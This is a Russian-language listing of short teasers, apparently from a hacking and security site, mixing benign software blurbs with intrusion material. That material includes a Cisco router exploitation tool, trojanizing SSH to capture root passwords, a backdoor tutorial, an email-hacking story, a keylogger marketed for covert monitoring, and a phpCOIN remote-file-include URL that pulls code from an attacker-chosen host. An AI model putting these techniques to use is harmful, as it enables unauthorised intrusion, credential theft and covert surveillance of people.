Cisco torch 0.4b
Cisco Torch – утилита для массового сканирования, обнаружения и эксплуатации Cisco маршрутизаторов от авторов "Hacking Exposed Cisco Networks".
Cisco Torch – утилита для массового сканирования, обнаружения и эксплуатации Cisco маршрутизаторов от авторов "Hacking Exposed Cisco Networks".
Об оформлении кода программ можно спорить бесконечно, одни пишут так, другие этак. Однако сегодня мы поговорим о том, как оформлять код неправильно, как намеренно сделать его менее читаемым. По научному это называется обфускацией, однако в данном случае это не обфускация в прямом понимании, а лишь действительно затруднение понимания
MIMEDefang - почтовая фильтрующая программа, которая работает с Sendmail 8.
Это руководство повествует о том как установить и запустить OpenSSH с chroot-ограничением. При помощи такой настройки появляется возможность дать пользователю shell доступ без опасения, что он сможет порушить весь сервер. Таким образом "входящий" юзер будет заперт в своей домашней директории без возможности покинуть ее.
Если вы хотите получить больше информации из вашего встроенного в Windows файрвола, то можно сделать так. Для логгирования дропнутых пакетов: netsh firewall set logging droppedpackets=enable Для логгирования соединений: netsh firewall set logging connections=enable Для получения конфигурации файрвола: netsh firewall show logging Для управления файлом лога: netsh set logging set logging maxfilesize=20480 netsh set logging %windir%\pfirewall.log
Плагин к программам из пакета Microsoft Office XP/2003, позволяющий удалять из документов Word, Excel и PowerPoint скрытые данные и сведения о процессе разработки документа - комментарии и т.
Кто не помнит фабулу фильма "Отчет меньшинства", когда с подсказки мутантов-провидцев полиция арестовывает человека прежде чем он совершит преступление? Еще недавно это было всего лишь фантастическим сценарием, однако, видимо, он может сбыться гораздо раньше, чем всем нам казалось
Кто такая Ксюша Собчак – точно не знает никто. Может запросто оказаться, что она – действительно силиконовое щупальце Толи Собчака, протянутое из могилы. Если верить группе «Культурная революция», он умер без ножа и нунчак
AIM Sniff – сетевой сниффер, предназначенный для перехвата сообщений от клиента AOL Instant Messenger.
Всем программистам известны те трудности, с которыми приходится сталкиваться при разработке различных программ. А каждый биолог уверен, что естественный отбор сложнее любых других процессов в этой Вселенной. Хотите посмотреть на интеграцию этих мнений? Скачайте себе программу «Амёбы: борьба видов», в которой изначально содержатся электронные амебы и которым предстоит развиться и передать свои электронные гены следующим поколениям..
Огромное количество организаций использует систему 1С:Предприятие, но не каждый пользователь подозревает о возможном проникновении в его систему чужаков и получении данных из базы, а также частичном управлении функциями 1С удаленно
Это фильтр контента для sendmail, способный обнаружить вирусы и спам.
Американский Центр реагирования на компьютерные угрозы, существующий при Университете Карнеги-Меллона в Питсбурге (Computer Emergency Responce Team), известен многим. И не только публикациями информации об уязвимостям в программных продуктах, но и широкой учебной и просветительской деятельностью в сфере компьютерной безопасности
Покупая sim каpточку, пpедофоpмленную на частное лицо или оpганизацию, ты покупаешь себе только одну тpеть анонимности. =) Втоpая тpеть состоит в том, чтобы иметь pазный imei для pазговоpов, котоpые не должны с тобой идентифицироваться
Family Key Logger - лучший выбор, если Вы хотите знать что другие делают за Вашим компьютером пока Вас нет дома.
Троянизация SSH для перехвата пароля Ну и, наконец, стандартный метод, связанный с протрояниванием SSH-демона, чтобы стырить рутовый пасс. Взламываем тачку и устанавливаем на нее снифер, который нюхает пассы по SSH - допустим, модифицирует /bin/ssh и все логирует ;)
Расширения для браузера Firefox, позволяющее ускорить загрузку веб-страниц.
Утилита для обнаружение и удаления разнообразных интернет-червей и backdoors - Mytob, Mydoom, Beagle, Netsky, Sasser, Blaster Zafi, Mabutu, Startpage и некоторрых других.
Вступление В этой статье я хотел бы рассказать о принципах работы с бэкдорами в *nix-like осях и, частично, об их написании. Сразу скажу - первая часть статьи рассчитана на новичков. Для начала разберемся, что такое бэкдор и с чем его едят
Так повелось, что я никогда не брался за взлом мыл. Но тут поступило заманчивое предложение от одного знакомого, которому позарез нужен был доступ к одному мылу. Само мыло располагалось на небольшом почтовике *.co.uk. Знакомый пробовал брутить мыло, но результата это не принесло и он обратился ко мне
Что-то последнее время потянуло меня на альтернативу признанным вещам ай-ти индустрии, вот и до программного обеспечения добрались. А представить сегодня я хочу вам OpenOffice.org – пакет прикладных программ для работы с текстовыми документами, электронными таблицами, изображениями, базами данных и презентациями, который выступает в пику многими облюбованному MS Office
1. Даны 2 буфера фиксированной длины. В начале каждого лежат данные (строчки текст), дальне до конца нули. Поменять строчки местами и перевернуть их задом наперед так, чтобы в итоге нули опять находились в конце, а текст - в начале
Держи курс на систему Медузы! = в Бобруйск, жывотное!. Могу предложить говоруна = учи албанский. Это склисс, он ничей = боян. Отличается умом и сообразительностью = аффтар жжот!. Растительности нет, полезных ископаемых нет, воды нет, населена роботами = кг/ам
Turtle Firewall v0.
Я не псих. Нет! Абсолютно!!! Просто они меня заставили. Притащили к компьютеру, бросили в кресло и сказали, что если я не напечатаю эту статью они взорвут Останкинскую Телебашню, Эрмитаж и Новосибирское метро. Погибнут тысячи людей из-за прихоти компьютерных файлов и некого в этом винить кроме меня, я не уследил за ними, я не знал, как далеко они продвинулись.
Расширяет контекстное меню Windows Explorer командами сравнения файлов.
Эта статья будет интересна в первую очередь начинающим хакерам. В ней я попытаюсь объяснить как применять php инклудинг. Сидя вечером 20 декабря Интернете я прочитал о только что найденной уязвимости в форуме phpCOIN. Статья называлась "PHP-инклудинг в phpCOIN v.1.2.2" Вот как выглядит данная уязвимость: http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location] Затем я пошел на www.altavista.com, набил для поиска phpCOIN 1.2.2 и стал разгребать найденные ссылки
Программа для обнаружения и удаления различных шпионских модулей, и прежде всего программ маскировки следов (т.
Видео-ролик по подбору WEP-ключа в беспроводной сети.
Привет, я продолжаю дальше свое повествование и подумал, что было бы неплохо описать в этой главе эвристическую классификацию. Помнишь я упоминал про систему порождающих правил и поиск решения в глубину и ширину? Правильно, что не помнишь, потому что не упоминал
Специальный поисковик для кодеров - ищет в исходниках! На настоящий момент им проиндексировано около 260 миллионов строк кода, так что думаю искомое сочетание ты обязательно отыщешь.
Организация, занимающаяся исследованиями Интернета.
French Security Incident Response Team - французский багтрак, регулярно обновляемый набор уязвимостей, эксплоитов и предупреждений о вирусах.
Творческий Союз "Ромашки" представляет: взлом www.
Утилита для подсчета трафика, передаваемого по локальной сети, и его графического отображения.
Интернет, как известно, это и огромная свалка и золотое дно одновременно. Что правит миром? Что самое главное в жизни и, пожалуй, в интернете? Ответ – деньги. Хотя, Данила Бодров со мной не согласился бы. :) Чтобы добыть денег надо взломать систему, которая бы производила операции с валютой, и желательно без такой крутой защиты как у eBay
Книга о создании культовой игры и модификаций для нее.
Однажды Хуккерс зашел на сайт веб мэйл ру, а тот вдруг перестал работать. Хуккерс сообразил - дело не чисто, а значит есть почва для 0-дей сплоита. Но Хуккерс был молод и неопытен, и не знал еще ни перла ни php, а что касается asp .net - его тогда и в проекте не было
Патч для устранения серьезной уязвимости в рендеринге wmf-файлов.